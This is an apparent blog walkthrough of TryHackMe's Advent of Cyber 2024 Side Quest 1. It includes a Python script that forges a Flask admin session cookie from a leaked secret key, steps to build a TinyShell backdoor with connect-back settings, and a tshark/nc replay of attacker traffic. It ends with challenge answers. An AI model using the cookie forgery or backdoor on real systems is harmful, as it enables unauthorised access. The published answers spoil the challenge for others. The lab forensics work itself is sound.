Post

Advent of Cyber SQ1 Walkthrough

Posted
Preview Image
By Charlie
2 min read
Advent of Cyber SQ1 Walkthrough

Advent of Cyber Side Quest n.1

Intro

On TryHackMe (THM) platform, a CTF called Advent of Cyber 2024 is currently underway. However, a more intriguing undeground CTF is taking place as well, known as the Side Quests, also referred to as the Advent of Cyber 2024 Side Quests

Let’s dive into the first one together!

Ransomware Note #1

fox

  1. Download the zip file: http://MACHINE_IP/aoc_sq_1.zip
  2. You will need to find L1 keycard to discover password for that zip.
    • The L1 keycard is likely in Day 1, judging by other players on the scoreboard.
    • In the Day 1 task, there’s a C2 machine and there is also:
      • app.secret_key = @09JKD0934jd712?djD
    • With that we can use flask-unsign or Flask cookie script
    • Now we should be able to view C2 interface, and there will be L1 Keycard
  3. Unzip the aoc_sq_1.zip and analyze using Wireshark:
    • At this stage, you should be able to answer two of the questions. (1.2.)
  4. There are also other interesting communication especially in frame n.153456
  5. Identify two binaries:
1
2

ff
exp_file_credential
  1. By identification we found tool called.: TinyTinyShell

Retreive encrypted data

  • The data as we can see was encrypted using tool called TinyTinyShell as we already found.

  1. We need to download this tool to decrypt origin traffic:

    git clone https://github.com/mame82/ls19_tsh_mod.git

  2. We need to comment lines from 497 to 500 in tshd.c otherwise the script will stop.
  3. We need to make some changes in tsh.h: secret, port and CONNECT_BACK_HOST: 
    1
2
3
4

    char secret = "SuP3RSeCrEt";
define SERVER_PORT 9001
short int server_port = SERVER_PORT;
define CONNECT_BACK_HOST "localhost"

    The secret SuP3RSeCrEt I found by using Ghidra and the file ff, you can also find it using strings -n 7

  4. We need to build binary:
    make linux
  5. We need to launch it and keep it opened:
    ./tshd -s SuP3RSeCrEt -p 9001
  6. We will extract attacker communication to replay this traffic into listener.:
    tshark -r traffic.pcap -Y "tcp.stream eq 73832 && ip.src != 10.10.103.220" -T fields -e data | xxd -r -p > attacker
  7. We will play this communication to retreive commands.:
    cat attacker | nc 127.0.0.1 9001
  8. Now we’ve got everything what we needed.

Fragments

L1 Keycard

L1 Keycard

1
2
3
4
5
6
7
8
9
10
11
12

from flask.sessions import SecureCookieSessionInterface
from flask import Flask

app = Flask(__name__)
app.secret_key = "@09JKD0934jd712?djD"

session_interface = SecureCookieSessionInterface()
signer = session_interface.get_signing_serializer(app)

session_data = {'logged_in': True, 'username': 'admin'}
cookie = signer.dumps(session_data)
print(cookie)

Questions & Answers

  1. What is the password the attacker used to register on the site?
    • QU9DMjAyNHtUaW55X1R
    • I found this password thannks to HTTP POST in wireshark http.request.method == "POST" in frame 153213
    • The username which was used is frostyfox
  2. What is the password that the attacker captured?
    • pbnlfVGlueV9TaDNsbF
    • In frame n. 153506 also HTTP POST
    • username was: mcskidy
  3. What is the password of the zip file transferred by the attacker?
    • 9jYW5fRW5jcnlwVF9iVXR
  4. What is McSkidy’s password that was inside the database file stolen by the attacker?
    • faXRfSXNfTjB0X0YwMGxwcm8wZn0=

Easter Egg: answers: 1 + 2 + 3 + 4 = base64 😉

TryHackMe
Flask CTF Wireshark PCAP TryHackMe Write-Up
This post is licensed under CC BY 4.0 by the author.